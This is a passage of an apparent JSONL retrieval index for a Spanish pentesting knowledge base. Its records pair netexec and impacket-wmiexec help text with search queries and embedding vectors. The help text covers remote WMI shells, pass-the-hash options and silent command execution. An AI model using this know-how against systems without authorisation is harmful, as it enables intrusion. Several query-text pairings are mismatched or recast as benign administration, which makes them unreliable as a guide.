0.05043, -0.01869, -0.03583, -0.04234, 0.03172, -0.04799, 0.104, -0.04343, -0.00338, 0.02169, -0.04695, 0.01457, 0.05509, -0.07402, -0.07526, 0.02232, -0.08904, -0.00422, -0.0624, 0.0368, 0.04876, -0.08249, 0.05023, 0.04304, 0.02651, 0.0552, 0.04373, 0.10763, 0.0417, -0.04767, 0.01697, -0.01991, -0.0369, -0.06405, 0.05819, -0.02354, -0.04537, 0.00685, 0.01817, 0.07655, -0.02829, -0.01922, 0.01209, 0.10076, -0.0326, 0.03295, -0.01348, 0.06258, 0.05516, 0.01795, -0.04959, 0.00219, 0.00698, 0.03157, -0.00847, -0.00919, -0.00487, 0.02037, -0.09998, -0.01531, 0.0851, 0.03901, -0.03553, 0.04879, 0.10779, 0.05072, 0.0116, -0.01599, 0.04212, 0.00746, -0.01201, -0.03171, -0.05115, 0.07116, 0.11012, 0.00495, 0.00482, 0.01996, 0.01838, 0.04061, 0.02961, -0.06221, -0.06341, 0.00901, -0.01171, 0.01015, -0.02377, -0.00506, -0.0028, 0.01741, 0.00909, -0.04398, -0.0234, -0.05079, 0.01635, -0.03352, -0.08274, 0.0483, -0.00781, 0.02877, -0.02899, 0.00429, -0.03887, 0.00231, -0.03073, 0.01662, 0.03449, 0.04188, 0.02142, -0.00377, 0.02196, 0.09061]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "cual es una alternativa libre a SSH para conectarme a servidores", "v": [-0.03915, 0.02229, -0.21243, -0.06238, -0.05169, -0.13114, -0.07973, -0.23242, -0.06868, 0.0401, -0.20302, -0.09564, 0.02751, -0.11069, 0.09627, 0.05678, 0.10345, -0.0896, 0.03504, 0.1029, 0.05879, 0.04183, -0.03241, -0.02219, -0.07897, -0.00433, 0.09841, 0.00497, -0.06888, 0.01473, 0.02096, -0.08441, 0.08438, 0.05515, 0.08812, -0.0281, 0.01273, 0.20488, 0.08885, 0.02913, 0.06493, -0.0367, -0.09582, 0.04178, 0.01945, -0.05159, 0.00737, -0.02929, 0.07588, 0.10388, -0.19022, 0.05118, -0.15236, -0.022, -0.05441, 0.04177, 0.09904, -0.13354, -0.07363, 0.01536, -0.15724, 0.08428, 0.00304, -0.03871, 0.07719, -0.03235, -0.05273, -0.03148, -0.098, 0.03876, 0.01456, 0.01584, -0.06572, -0.06305, -0.08662, 0.17403, -0.05079, -0.05168, 0.0426, 0.08178, 0.0317, -0.07667, 0.02575, 0.07561, -0.10944, -0.04776, 0.0365, -0.05981, 0.02507, 0.05827, 0.03291, 0.05578, -0.0188, 0.10574, -0.01628, -0.05818, 0.03814, -0.04992, 0.0201, 0.04601, 0.09252, 0.10271, -0.05669, 0.07472, -0.03314, -0.02536, 0.03524, 0.01412, -0.00266, 0.03187, 0.03567, -0.04363, 0.01108, 0.03154, -0.04031, -0.09785, -0.01961, -0.01617, -0.03433, 0.07868, -0.0622, -0.03086, 0.01881, -0.04528, 0.00773, 0.04575, 0.06889, 0.01553, -0.01775, 0.06077, 0.07761, 0.00271, -0.05212, -0.10087, -0.09767, -0.03097, 0.12403, -0.08294, -0.02141, -0.0386, 0.00257, -0.0075, 0.01469, -0.04446, 0.03418, -0.05535, 0.06225, -0.04958, -0.04466, 0.00212, -0.05604, -0.00049, -0.09086, 0.07086, -0.04241, 0.03478, -0.00211, -0.03021, -0.08007, 0.09521, 0.03846, -0.04309, 0.05129, 0.05838, 0.01641, -0.00131, -0.04791, 0.00647, -0.00245, 0.02432, -0.01207, 0.02247, 0.05343, -0.0507, 0.00066, -0.08859, -0.07556, -0.06487, 0.09548, 0.00073, 0.00332, 0.03287, -0.08855, -0.04506, -0.05495, -0.01116, -0.02422, -0.01349, -0.0048, 0.02058, -0.02107, 0.00857, -0.06991, -0.015, 0.02099, -0.03517, 0.02412, -0.07436, -0.0192, 0.00283, -0.06315, -0.01797, -0.06823, -0.00399, 0.00594, -0.00249, -0.05048, 0.03555, 0.00712, 0.05841, 0.04463, -0.02275, 0.13348, -0.02794, -0.02785, -0.00114, 0.03546, -0.08346, 0.02123, 0.01472, 0.01698, 0.02914, 0.00881, 0.00822, -0.0258, 0.02306, -0.00486, 0.03265, -0.00748, -0.01524, -0.02278, 0.00549, 0.02983, 0.01124, -0.02128, -0.00217, -0.01511, -0.0187, -0.00643, -0.0146, 0.03968, 0.09168, -0.02356, -0.02218, -0.01949, -0.05747, -0.08635, -0.03567, -0.0461, -0.03062, 0.01995, 0.03718, 0.02372, 0.00871, 0.01245, 0.00644]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "con que herramienta accedo a mis impresiones remota usando RDP", "v": [0.0253, -0.01705, -0.21728, -0.22449, 0.20289, 0.07788, -0.02403, 0.06922, -0.11608, 0.03504, -0.00497, -0.09773, 0.01997, -0.14099, 0.10391, -0.04184, 0.01118, 0.13383, -0.06565, -0.06369, 0.03893, -0.0617, -0.07763, 0.01571, 0.02951, -0.05325, 0.00805, 0.06139, -0.0524, -0.0134, 0.12442, 0.0073, 0.00772, -0.09408, -0.14148, -0.12122, 0.04665, 0.06618, 0.06272, 0.06337, 0.07205, 0.0266, -0.16944, -0.00236, 0.07968, -0.02654, -0.01812, 0.05469, 0.01262, 0.11085, -0.10391, -0.07067, -0.1794, -0.02539, 0.0133, -0.08574, 0.26103, -0.03981, 0.13933, -0.00065, -0.02052, 0.06275, -0.06259, -0.01405, -0.0126, -0.09016, -0.01811, -0.12613, -0.07746, 0.0817, -0.09513, 0.02724, 0.04131, -0.0492, 0.04532, -0.03996, -0.07536, 0.06019, 0.07929, -0.05745, -0.08919, -0.04068, -0.1174, -0.0095, -0.09901, -0.12307, 0.15752, -0.0147, -0.00049, -0.08177, -0.06253, 0.01544, -0.02862, 0.07162, 0.08037, -0.00532, 0.00761, 0.01816, 0.00777, 0.00662, 0.0984, 0.04619, -0.04497, 0.02972, -0.0452, -0.00395, 0.07469, -0.03518, -0.01348, 0.02, 0.05833, 0.05706, -0.00697, -0.01772, -0.01556, 0.01444, -0.03568, -0.1278, -0.02628, -0.10099, 0.03731, 0.01958, -0.0427, -0.05765, 0.05098, -0.01175, -0.06482, -0.0043, -0.00137, -0.01467, -0.00155, -0.03496, -0.05872, 0.00611, -0.01809, -0.02604, -0.04704, -0.10541, 0.01771, -0.10309, 0.02543, 0.03253, 0.02411, -0.04684, 0.05922, 0.06481, 0.0007, -0.05073, -0.00664, 0.02198, 0.0342, -0.11467, -0.00318, 0.00919, -0.02633, 0.00831, -0.05273, -0.03508, -0.06138, 0.01937, -0.10671, -0.10993, 0.02675, -0.0229, 0.02358, -0.1084, -0.00867, -0.01524, 0.02759, 0.03555, -0.0528, 0.00926, 0.07608, 0.01135, 0.01676, -0.01601, -0.00824, -0.03722, -0.02267, -0.02245, -0.05507, 0.01097, -0.01945, -0.01581, 0.05687, 0.01935, -0.02497, -0.02713, 0.03238, -0.04222, -0.01099, 0.03113, 0.01306, -0.06903, 0.05336, -0.00424, -0.03369, -0.07866, 0.00151, 0.0152, -0.03026, -0.02878, -0.01175, -0.06604, 0.03902, 0.02319, -0.01134, 0.05432, -0.05459, 0.05537, 0.02962, -0.00405, 0.01528, -0.02465, -0.01501, -0.00865, -0.02493, 0.0031, -0.0246, -0.03846, 0.01773, 0.02798, 0.03363, -0.00505, -0.0453, 0.08668, 0.03684, 0.00968, 0.01296, -0.06418, 0.06073, -0.04227, -0.02086, -0.0331, -0.0011, -0.061, 0.03443, 0.01959, -0.04423, -0.0372, 0.01797, 0.03255, -0.00285, -0.01666, -0.01556, -0.01814, -0.0476, 0.0173, -0.00201, -0.03617, 0.00252, 0.02912, 0.04861, -0.0253, -0.01344, 0.0037]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "que programa puedo usar para ejecutar comandos remotos en Windows", "v": [0.15226, 0.06909, -0.11399, -0.15881, 0.09132, 0.00404, 0.07526, -0.03944, -0.07002, -0.09988, -0.12353, -0.08567, 0.06172, -0.05672, -6e-05, 0.03712, 0.08692, 0.02838, -0.04526, -0.01967, 0.06382, -0.11539, 0.00571, 0.03918, -0.02048, 0.06595, 0.10786, 0.0047, -0.07233, -0.08958, 0.01856, 0.02298, 0.05749, -0.08979, -0.03055, 0.01682, -0.06438, 0.05782, 0.01517, 0.10781, 0.04907, 0.09621, -0.1547, -0.01176, 0.07603, -0.03167, 0.10721, -0.06553, 0.05675, -0.08805, 0.01134, -0.05187, -0.05404, -0.04984, 0.01436, -0.08678, 0.1971, -0.09643, -0.06422, 0.0356, 0.0071, -0.02631, 0.05124, 0.08056, 0.0209, -0.06912, -0.00927, -0.09216, -0.08887, 0.0987, -0.1271, 0.04731, 0.03427, 0.05082, 0.02334, 0.0064, -0.10011, -0.06953, 0.14859, -0.06331, -0.05936, 0.0157, -0.02332, -0.01525, -0.12578, -0.17457, -0.01149, -0.0245, -0.01028, -0.11636, 0.06192, -0.04571, -0.01972, 0.04683, 0.11089, -0.00033, 0.04415, 0.01935, 0.02978, 0.06201, -0.00516, -0.05479, -0.04173, 0.14296, -0.02325, 0.06057, 0.07184, -0.07715, -0.01065, -0.00748, 0.005, -0.02766, -0.04282, -0.08396, -0.08882, -0.0466, -0.03268, -0.08597, 0.05221, -0.03022, -0.14367, 0.04172, -0.02062, 0.04277, 0.07713, -0.05151, -0.07051, 0.11618, -0.05285, 0.06158, -0.00997, -0.00842, 0.02899, -0.09895, -0.09323, 0.07221, -0.00886, -0.04745, 0.00042, -0.15241, 0.07111, 0.07287, 0.02892, 0.03319, 0.06713, 0.01233, 0.03661, -0.01454, -0.01561, 0.01757, 0.0995, -0.00306, -0.07498, 0.04895, -0.07665, -0.03815, -0.0163, 0.01324, -0.02729, 0.04941, -0.03935, -0.00019, -0.05032, -0.04667, 0.07404, -0.05109, 0.00567, -0.00679, 0.05083, 0.0709, -0.06646, 0.11308, -0.00319, -0.05562, -0.00348, -0.036, 0.00946, -0.00799, 0.00101, -0.0125, -0.10833, 0.07093, 0.00633, -0.05918, 0.03461, 0.0286, -0.03802, 0.05212, -0.03149, 0.00337, -0.06375, 0.04064, 0.01746, -0.03786, -0.00063, -0.02249, -0.02474, 0.00168, -0.01276, -0.03815, -0.08351, 0.00533, 0.02653, -0.06763, 0.1189, 0.04434, -0.04497, 0.08118, 0.04386, 0.103, 0.01083, -0.06622, 0.05937, -0.00287, -0.04868, -0.07931, 0.01618, -0.01322, 0.02189, 0.00283, -0.00682, 0.01563, 0.06133, 0.00482, 0.03706, -0.01814, -0.00302, -0.00575, 0.0317, -0.01215, -0.00702, 0.00975, -0.00384, -0.05293, 0.03022, -0.01524, -0.01289, -0.0529, -0.0123, -0.02263, -0.07459, 0.09399, -0.01096, -0.08844, -0.04862, -0.05513, -0.11494, 0.02384, -0.01912, -0.02879, -0.01448, 0.02695, 0.05577, -0.04515, -0.02843, 0.03399]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "cΓ³mo montar una sesiΓ³n interactiva a travΓ©s de WMI", "v": [0.00949, 0.21281, -0.11816, -0.08313, -0.04023, -0.02698, -0.15521, -0.01419, -0.09379, -0.19008, -0.06046, -0.00328, 0.09396, -0.04451, 0.10764, 0.09775, 0.06128, -0.09092, 0.01819, -0.04011, 0.02579, 0.04983, -0.01788, -0.03717, 0.02274, 0.02834, 0.06752, -0.12797, -0.01802, -0.01942, 0.00424, -0.02999, 0.04773, 0.03408, -0.05956, -0.15258, -0.06216, -0.00824, 0.06552, -0.01333, -0.07462, -0.03554, -0.08118, 0.05686, 0.17083, 0.00302, 0.07351, -0.10239, 0.06866, 0.05479, -0.00119, 0.07524, 0.01782, 0.08143, -0.09431, -0.12205, 0.12662, -0.09269, 0.02367, -0.03413, 0.07851, 0.06021, -0.15498, 0.03739, 0.15359, -0.05828, -0.01727, -0.05139, -0.0936, 0.15084, -0.01828, -0.11956, -0.02578, 0.00151, 0.13783, 0.04177, 0.00819, -0.0713, 0.07826, -0.02375, -0.03567, -0.0415, 0.14556, 0.13008, -0.10029, 0.03665, 0.04285, -0.04473, 0.00802, 0.00585, -0.01404, 0.03543, 0.06671, -0.12964, -0.02721, -0.09313, -0.02244, 0.07559, 0.02633, 0.09151, -0.0569, -0.0323, -0.06773, 0.07462, 0.06068, -0.01283, -0.0172, 0.03416, -0.03416, -0.05501, 0.00112, 0.05641, -0.15886, -0.06819, -0.0448, -0.04036, -0.03156, 0.03245, -0.04877, -0.02063, -0.05914, 0.08528, 0.04283, -0.08592, -0.04236, 0.01368, 0.01808, 0.05219, -0.05282, 0.02553, -0.05355, -0.06798, 0.03627, -0.09569, 0.0282, -0.0219, -0.01101, -0.07631, -0.08063, -0.0229, 0.04563, -0.02136, 0.03606, -0.10239, 0.01498, -0.00486, 0.10606, 0.00047, -0.07181, 0.09494, -0.0253, 0.06474, 0.08337, -0.05778, -0.03373, -0.00758, 0.03226, -0.04953, -0.01996, 0.05599, -0.01544, -0.06702, 0.01261, -0.02155, -0.00908, -0.01612, -0.10702, -0.01234, 0.00562, -0.0774, -0.02495, 0.10055, 0.01482, 0.0032, 0.06144, 0.03812, -0.00192, 0.02221, 0.05617, -0.08311, -0.014, -0.04183, 0.02383, -0.03051, -0.10826, -0.00964, -0.02299, 0.00871, -0.02246, 0.01513, -0.00204, 0.04254, -0.03789, 0.06175, 0.06512, -0.02094, 0.00374, 0.02276, 0.03654, -0.01968, 0.00734, 0.00271, -0.0058, 0.00458, 0.00185, -0.03026, -0.02033, 0.04281, 0.03577, 0.01718, 0.03066, 0.00825, 0.08887, -0.04766, 0.03141, 0.00584, -0.02139, -0.03557, -0.05027, 0.07056, 0.00144, 0.04959, 0.05902, -0.02292, 0.02954, 0.00816, 0.02417, 0.00933, -0.01051, -0.00078, 0.03028, 0.01309, 0.05846, 0.02829, 0.07806, 0.00948, 0.02832, 0.00464, -0.03239, -0.00848, 0.04096, 0.09445, -0.00642, -0.01745, 0.04752, -0.06578, -0.06068, 0.04358, -0.0069, -0.03414, -0.08262, -0.01385, 0.07267, 0.0101, -0.02396, -0.0963]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "quΓ© herramienta sirve para correr un shell en destino usando el protocolo de gestiΓ³n", "v": [-0.07766, 0.01006, -0.19232, -0.28395, -0.00641, -0.15622, -0.03468, -0.06474, 0.03892, -0.0881, -0.09521, 0.0046, 0.00704, -0.13861, 0.04786, -0.05076, 0.03875, 0.03828, 0.03067, -0.06063, -0.09663, -0.00307, -0.04884, -0.06663, -0.03391, 0.02617, 0.10723, -0.01313, -0.1157, -0.08395, 0.02779, 0.03476, 0.14479, -0.08506, -0.05207, -0.04112, -0.04883, 0.07423, -0.04057, 0.08659, -0.10014, -0.00689, -0.12213, 0.07929, 0.13068, -0.05864, 0.02052, -0.02741, 0.03167, -0.04398, 0.0466, -0.05262, -0.07937, 0.01992, 0.0133, 0.07924, 0.09232, -0.09696, 0.04202, -0.09496, -0.10942, -0.10661, -0.02474, 0.07124, 0.00165, -0.05725, -0.00705, -0.08171, -0.15163, -0.05733, 0.02324, 0.02247, -0.01661, 0.09748, 0.04491, -0.07659, 0.0277, 0.10494, 0.10981, 0.01632, 0.0129, -0.04816, -0.04482, 0.09328, -0.09418, -0.08968, 0.02999, -0.00066, 0.13656, -0.04742, -0.08776, -0.05463, -0.09243, -0.0723, -0.03254, 0.00205, 0.09533, 0.01258, 0.01914, 0.11652, 0.05011, -0.00648, -0.12574, 0.05318, -0.02532, 0.07201, 0.03029, -0.07091, 0.00611, 0.06056, -0.06569, -0.02815, -0.01335, -0.0359, -0.01258, 0.05592, -0.0423, -0.04239, -0.05454, -0.02525, -0.07575, -0.00498, -0.09953, -0.04683, 0.02292, -0.04118, 0.0146, 0.11566, 0.06718, -0.01586, -0.00114, -0.00989, -0.11518, 0.02293, -0.06577, 0.05726, -0.00324, -0.0231, 0.00222, -0.02244, -0.00944, 0.01187, -0.06942, 0.00806, -0.0332, -0.03617, 0.04719, -0.02652, -0.11251, 0.06441, 0.03581, -0.06225, -0.06935, 0.01776, -0.1364, -0.03955, 0.00149, -0.00771, -0.12997, -0.02476, -0.08467, -0.02503, 0.01269, 0.0767, -0.00542, -0.03082, 0.04532, -0.05126, 0.04701, 0.07601, 0.07306, 0.04622, 0.04862, 0.01082, 0.01651, -0.08909, -0.05711, -0.03678, 0.04086, -0.0501, -0.0111, 0.02946, 0.01862, 0.00844, 0.02447, -0.06718, 0.0136, 0.01903, 0.00787, 0.05206, 0.03928, 0.03803, 0.08909, -0.07077, 0.00109, 0.00792, 0.01561, -0.07386, 0.0081, -0.02955, -0.12667, 0.02506, 0.06274, -0.03819, 0.09966, 0.09289, -0.05846, 0.00418, 0.01467, 0.06639, 0.03867, -0.00575, 0.01086, 0.04871, -0.00481, 0.01547, 0.02274, 0.03043, 0.00027, -0.0797, 0.04181, 0.01775, -0.00905, 0.0444, 0.01727, 0.00316, 0.00615, -0.02249, 0.04246, -0.05398, -0.00851, -0.02292, -0.00897, 0.03975, 0.01439, -0.00626, 0.01842, -0.01404, -0.04249, -0.04924, -0.05788, 0.07015, -0.07986, -0.05011, -0.02438, 0.01508, -0.05306, 0.00477, -0.03811, -0.03709, -0.04788, -0.01244, 0.01555, 0.00812, 0.02345, -0.03962]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "que programa sirve para compartir archivos a travΓ©s de red", "v": [0.01462, 0.01727, -0.09079, -0.28208, 0.06466, -0.14519, 0.00466, -0.08367, 0.04682, -0.147, -0.0794, -0.14164, 0.01909, -0.14728, 0.07684, 0.02484, 0.10945, 0.01399, 0.15035, -0.00513, 0.02005, 0.06897, -0.074, -0.0885, 0.02735, 0.02364, 0.08029, -0.01546, -0.01225, 0.08255, -0.00292, -0.03836, 0.04633, -0.0889, -0.02729, 0.03039, 0.08324, 0.10293, -0.07675, 0.02454, -0.03, 0.09517, -0.05739, 0.06867, 0.01856, -0.03919, 0.03646, -0.01848, -0.02502, 0.01877, -0.04303, -0.03324, -0.05494, -0.00764, -0.0264, -0.06446, -0.12102, -0.16991, -0.14055, 0.05303, 0.01131, -0.00563, -0.03117, -0.04354, -0.03998, -0.04535, -0.00618, 0.08489, -0.16318, 0.14679, 0.01328, 0.09849, 0.04819, -0.01407, -0.0943, -0.00385, -0.03277, -0.08338, -0.02239, -0.11365, 0.05396, 0.02428, 0.06038, 0.07347, 0.01102, -0.04886, 0.10929, -0.02402, -0.01112, -0.03302, -0.00038, 0.01515, 0.08279, 0.01995, 0.09772, -0.05601, 0.11903, -0.03437, 0.01487, -0.01021, 0.03713, -0.03927, -0.03434, 0.03454, 0.00413, 0.12936, 0.04903, 0.04152, 0.01708, 0.02728, 0.10129, -0.00479, 0.04058, 0.04083, -0.05918, 0.02126, 0.00287, -0.01847, 0.03857, -0.03697, -0.05709, 0.09657, -0.08283, 0.00162, 0.09422, -0.01811, -0.04222, 0.1108, -0.09576, 0.11822, -0.01707, 0.05876, -0.01806, -0.021, -0.11957, -0.10328, 0.04686, -0.00191, -0.02156, -0.08638, 0.05399, 0.03355, -0.03477, -0.02023, 0.02915, 0.06679, 0.05715, -0.07718, 0.02369, -0.00591, -0.07225, -0.01083, -0.05369, -0.07678, -0.06613, 0.04252, 0.04455, -0.05761, -0.1102, 0.037, -0.08248, 0.01746, -0.05664, -0.0356, 0.02723, -0.06905, 0.02323, 0.03681, 0.09799, 0.02616, 0.01028, 0.08171, -0.03041, -0.0771, -0.06655, 0.02274, -0.03697, -0.16634, 0.04373, -0.04775, -0.05848, -0.00794, 0.02928, 0.06807, -0.02582, -0.07183, -0.0197, 0.05221, -0.02517, -0.01064, -0.01033, -0.07095, -0.01012, 0.04454, -0.01015, 0.00831, -0.05065, 0.004, 0.05537, -0.0337, -0.06003, 0.00335, -0.03359, 0.05947, 0.01772, 0.06463, 0.00709, 0.00391, 0.08017, 0.09983, -0.0186, -0.00548, 0.05865, -0.01765, -0.03881, -0.03255, 0.01832, 0.05007, 0.10302, 0.03373, 0.05741, -0.04626, -0.00607, 0.04829, 0.00447, -0.03336, 0.00375, -0.03861, 0.00732, -0.03105, 0.01329, -0.04165, 0.01593, 0.01795, 0.01554, -0.03759, 0.00837, 0.03616, -0.00514, -0.09667, -0.04008, 0.06162, -0.02071, -0.0432, 0.01079, 0.0194, -0.05665, -0.01328, 0.05922, -0.0028, -0.03338, 0.04912, 0.00606, 0.00718, 0.03415, 0.04748]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "cΓ³mo puedo ejecutar comandos en una mΓ‘quina remota sin que salga nada por pantalla", "v": [0.12957, 0.0531, -0.15644, -0.06981, -0.06374, -0.09656, 0.02243, -0.01055, -0.07541, -0.01145, -0.14088, -0.02999, 0.17365, -0.03301, 0.03452, 0.10058, 0.08637, 0.0695, -0.02406, -0.08694, 0.04595, -0.116, 0.02972, -0.03725, -0.0045, 0.01609, 0.13296, 0.10442, -0.12778, -0.17769, -0.04257, 0.02407, 0.16926, -0.15636, -0.01834, 0.05049, -0.02518, -0.00928, 0.02587, 0.06239, -0.02227, 0.07874, -0.1576, -0.02943, 0.14223, -0.07234, 0.15854, -0.00095, 0.02935, -0.04741, -0.07625, -0.03813, -0.06275, -0.00853, -0.04153, -0.08207, 0.24153, -0.06927, 0.0781, -0.02147, 0.00623, -0.05935, -0.00769, 0.05224, -0.04175, -0.03049, -0.03708, -0.06387, -0.02043, 0.06553, -0.08859, -0.0036, -0.06658, 0.01261, 0.07327, -0.03685, -0.10116, -0.01573, 0.10966, -0.01133, -0.01355, -0.0465, -0.1245, -0.02483, -0.09383, -0.13749, -0.0689, -0.0296, -0.01635, -0.14649, 0.04828, 0.00149, -0.01747, 0.00036, 0.10772, 0.04783, 0.05755, -0.01061, 0.02801, 0.00787, 0.06629, -0.04653, -0.03468, 0.11437, -0.03817, 0.10017, 0.06966, -0.08023, 0.02285, -0.0677, 0.06441, -0.04574, -0.04364, -0.05201, -0.10809, -0.03467, -0.04572, -0.03646, -0.04081, 0.01592, -0.09974, 0.0115, 0.01859, -0.04564, 0.07461, -0.04143, -0.01454, 0.05578, -0.00449, 0.00346, 0.01505, -0.02138, 0.07903, -0.07333, 0.02687, 0.07946, -0.00612, -0.06339, -0.07551, -0.17467, 0.06681, 0.06143, -0.01677, -0.03303, 0.08248, -0.00868, 0.05231, -0.11025, -0.0697, 0.03547, 0.09516, -0.00232, -0.00585, 0.06521, -0.04029, -0.03131, -0.02731, 0.01186, -0.02458, 0.04612, -0.01849, -0.02342, -0.10669, -0.00811, 0.0053, -0.02105, -0.07103, -0.02712, 0.00392, 0.00992, -0.04239, 0.04684, 0.00454, -0.0045, 0.00192, -0.04836, 0.01646, 0.02054, 0.0049, 6e-05, -0.02324, 0.0751, -0.04669, -0.07426, -0.00742, -0.00727, -0.02882, -0.01354, -0.00509, -0.00249, 0.03854, 0.06608, -0.03413, -0.03666, 0.0398, -0.01572, -0.02442, 0.02219, -0.01182, -0.04499, -0.05106, -0.02764, 0.02828, -0.01842, 0.03996, 0.0191, -0.04248, 0.09653, -0.04859, 0.05372, 0.03462, -5e-05, 0.03076, -0.02016, -0.07099, -0.0267, 0.05362, -0.02693, -0.04291, 0.00609, 0.0498, -0.00907, 0.06248, -0.00483, 0.01675, 0.03601, 0.02959, 0.03781, 0.01065, -0.03447, -0.00926, 0.02194, 0.00058, -0.02918, 0.01331, 0.01062, -0.00808, -0.05224, -0.01693, -0.00996, -0.00822, 0.08216, 0.02994, -0.07025, -0.01751, -0.05133, -0.08926, 0.00865, -0.04301, -0.05808, -0.02962, 0.00045, 0.0469, -0.01711, -0.02263, 0.02368]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py 